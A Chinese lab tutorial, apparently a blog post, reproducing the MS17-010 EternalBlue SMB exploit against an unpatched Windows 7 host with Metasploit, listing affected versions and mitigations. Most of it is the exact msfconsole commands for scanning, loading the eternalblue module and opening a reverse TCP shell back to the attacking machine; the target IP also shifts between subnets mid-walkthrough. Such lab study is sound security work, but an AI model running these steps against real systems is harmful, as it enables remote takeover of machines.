MS17-010 ——永恒之蓝漏洞利用

背景介绍

原理:“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器,利用Windows系统的SMB漏洞可以获取系最高权限。

影响范围:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。

防范措施:及时更新Windows系统补丁;不要轻易打开陌生的文件;关闭445、139端口。

环境:

攻击机:kali IP:192.168.137.44
靶机:win7 IP:192.168.137.190 (开放445端口且没有打补丁)
工具:MSF框架

漏洞复现:

nmap对靶机进行扫描
在这里插入图片描述
1. 在kali终端打开metasploit

msfconsole

在这里插入图片描述
2. 寻找永恒之蓝相关扫描模块

search ms17-010

在这里插入图片描述
3. 利用扫描模块扫描确定漏洞

  1. 利用smb_ms17_010漏洞扫描模块,利用它可以确定目标是否存在该漏洞。
use auxiliary/scanner/smb/smb_ms17_010
  1. 查看需要填充哪些参数
show options

RHOSTS参数是你即将扫描的网段,当然也可以只有一个主机IP
在这里插入图片描述

  1. 设置靶机IP地址
set rhosts 192.168.137.190
  1. 开始扫描
exploit 或 run  都表示开始执行

如果结果中前面有个绿色的加号,则说明可以利用该漏洞
在这里插入图片描述

4. 利用攻击模块攻击

  1. 选择攻击模块
use exploit/windows/smb/ms17_010_eternalblue
  1. 选择payload
set payload generic/shell_reverse_tcp
  1. 设置rhost(靶机IP)
set rhost 192.168.1.103
  1. 设置lhost(攻击机IP)
set lhost 192.168.1.105
  1. 设置监听端口(默认是4444)
set lport 500  

在这里插入图片描述
6) 开始攻击

exploit 或 run

在这里插入图片描述
5. 反弹shell

在这里插入图片描述
win7查看端口建立连接

netstat -an

在这里插入图片描述

  • 6
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值